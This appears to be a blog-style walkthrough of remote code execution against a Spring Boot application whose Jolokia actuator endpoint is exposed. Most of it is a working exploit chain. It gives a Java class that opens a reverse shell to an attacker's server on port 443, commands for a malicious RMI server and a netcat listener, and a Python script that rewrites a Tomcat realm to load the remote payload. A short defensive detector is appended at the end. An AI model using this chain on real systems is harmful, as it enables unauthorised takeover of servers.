Spring Boot actuator misconfiguration RCE (jolokia)

Published: 2025/3/15

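During routine scanning I found a Spring Boot actuator.

The jolokia endpoint is exposed, and jolokia/list contains the keyword type=MBeanFactory.

jolokia-realm-jndi-rce can be used here. The steps are as follows.
First, start a web server with python3: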

python3 -m http.server 8080

Compile the Java exploit code:

/**
 *  javac -source 1.5 -target 1.5 JNDIObject.java
 *
 *  Build By LandGrey
 * */
import java.io.File;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;

public class JNDIObject {
    static {
        try {
            String ip = "your-vps-ip";
            String port = "443";
            String py_path = null;
            String[] cmd;
            if (!System.getProperty("os.name").toLowerCase().contains("windows")) {
                String[] py_envs = new String[]{"/bin/python", "/bin/python3", "/usr/bin/python", "/usr/bin/python3", "/usr/local/bin/python", "/usr/local/bin/python3"};
                for (int i = 0; i < py_envs.length; ++i) {
                    String py = py_envs[i];
                    if ((new File(py)).exists()) {
                        py_path = py;
                        break;
                    }
                }
                if (py_path != null) {
                    if ((new File("/bin/bash")).exists()) {
                        cmd = new String[]{py_path, "-c", "import pty;pty.spawn(\"/bin/bash\")"};
                    } else {
                        cmd = new String[]{py_path, "-c", "import pty;pty.spawn(\"/bin/sh\")"};
                    }
                } else {
                    if ((new File("/bin/bash")).exists()) {
                        cmd = new String[]{"/bin/bash"};
                    } else {
                        cmd = new String[]{"/bin/sh"};
                    }
                }
            } else {
                cmd = new String[]{"cmd.exe"};
            }
            Process p = (new ProcessBuilder(cmd)).redirectErrorStream(true).start();
            Socket s = new Socket(ip, Integer.parseInt(port));
            InputStream pi = p.getInputStream();
            InputStream pe = p.getErrorStream();
            InputStream si = s.getInputStream();
            OutputStream po = p.getOutputStream();
            OutputStream so = s.getOutputStream();
            while (!s.isClosed()) {
                while (pi.available() > 0) {
                    so.write(pi.read());
                }
                while (pe.available() > 0) {
                    so.write(pe.read());
                }
                while (si.available() > 0) {
                    po.write(si.read());
                }
                so.flush();
                po.flush();
                Thread.sleep(50L);
                try {
                    p.exitValue();
                    break;
                } catch (Exception e) {
                }
            }
            p.destroy();
            s.close();
        } catch (Throwable e) {
            e.printStackTrace();
        }
    }
}

javac -source 1.5 -target 1.5 JNDIObject.java

Set up a malicious RMI service:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://vps:8080/#JNDIObject 1389

Listen on the port:

nc -lvp 443

Run the exp:

#!/usr/bin/env python3
# coding: utf-8
# Referer: https://ricterz.me/posts/2019-03-06-yet-another-way-to-exploit-spring-boot-actuators-via-jolokia.txt

import requests

url = 'http://127.0.0.1:8080/jolokia'

create_realm = {
    "mbean": "Tomcat:type=MBeanFactory",
    "type": "EXEC",
    "operation": "createJNDIRealm",
    "arguments": ["Tomcat:type=Engine"]
}

wirte_factory = {
    "mbean": "Tomcat:realmPath=/realm0,type=Realm",
    "type": "WRITE",
    "attribute": "contextFactory",
    "value": "com.sun.jndi.rmi.registry.RegistryContextFactory"
}

write_url = {
    "mbean": "Tomcat:realmPath=/realm0,type=Realm",
    "type": "WRITE",
    "attribute": "connectionURL",
    "value": "rmi://your-vps-ip:1389/JNDIObject"
}

stop = {
    "mbean": "Tomcat:realmPath=/realm0,type=Realm",
    "type": "EXEC",
    "operation": "stop",
    "arguments": []
}

start = {
    "mbean": "Tomcat:realmPath=/realm0,type=Realm",
    "type": "EXEC",
    "operation": "start",
    "arguments": []
}

flow = [create_realm, wirte_factory, write_url, stop, start]

for i in flow:
    print('%s MBean %s: %s ...' % (i['type'].title(), i['mbean'], i.get('operation', i.get('attribute'))))
    r = requests.post(url, json=i)
    r.json()
    print(r.status_code)

python3 springboot-realm-jndi-rce.py

Then wait two seconds and the shell comes back.
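
As a detection-side counterpart to the request sequence above, this added example (not part of the original post) flags clients whose Jolokia POST bodies create a JNDI realm and then point a realm's connectionURL at a remote JNDI service. It assumes request bodies are captured by a reverse proxy or WAF; the function names, sample events, addresses and host name are constructed for illustration.

```python
import json

# Request fields used by the realm/JNDI chain shown above.
RISKY_ATTRIBUTES = {"contextFactory", "connectionURL"}
REMOTE_SCHEMES = ("rmi://", "ldap://", "ldaps://")

def classify(body):
    """Return findings for one Jolokia POST body (JSON text)."""
    try:
        parsed = json.loads(body)
    except ValueError:
        return []
    # Jolokia accepts a single request object or a bulk array of them.
    reqs = parsed if isinstance(parsed, list) else [parsed]
    findings = []
    for req in reqs:
        if not isinstance(req, dict):
            continue
        rtype = str(req.get("type", "")).lower()
        mbean = str(req.get("mbean", ""))
        # An operation may carry a signature, e.g. "name(java.lang.String)".
        operation = str(req.get("operation", "")).split("(")[0]
        attribute = str(req.get("attribute", ""))
        if rtype == "exec" and operation == "createJNDIRealm":
            findings.append("exec:createJNDIRealm")
        elif rtype == "write" and "type=Realm" in mbean and attribute in RISKY_ATTRIBUTES:
            tag = "write:" + attribute
            if str(req.get("value", "")).lower().startswith(REMOTE_SCHEMES):
                tag += ":remote-jndi-url"
            findings.append(tag)
    return findings

def suspicious_clients(events):
    """events: (client, body) pairs. Flag clients that both create a JNDI
    realm and point a realm's connectionURL at a remote JNDI service."""
    seen = {}
    for client, body in events:
        seen.setdefault(client, set()).update(classify(body))
    wanted = {"exec:createJNDIRealm", "write:connectionURL:remote-jndi-url"}
    return sorted(c for c, f in seen.items() if wanted <= f)

# Constructed sample events (documentation addresses, placeholder host).
SAMPLE_EVENTS = [
    ("192.0.2.10", '{"mbean":"Tomcat:type=MBeanFactory","type":"EXEC","operation":"createJNDIRealm","arguments":["Tomcat:type=Engine"]}'),
    ("192.0.2.10", '{"mbean":"Tomcat:realmPath=/realm0,type=Realm","type":"WRITE","attribute":"connectionURL","value":"rmi://registry.example:1389/Obj"}'),
    ("198.51.100.7", '{"mbean":"java.lang:type=Memory","type":"read","attribute":"HeapMemoryUsage"}'),
    ("198.51.100.7", "not json"),
]

if __name__ == "__main__":
    print(suspicious_clients(SAMPLE_EVENTS))
```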
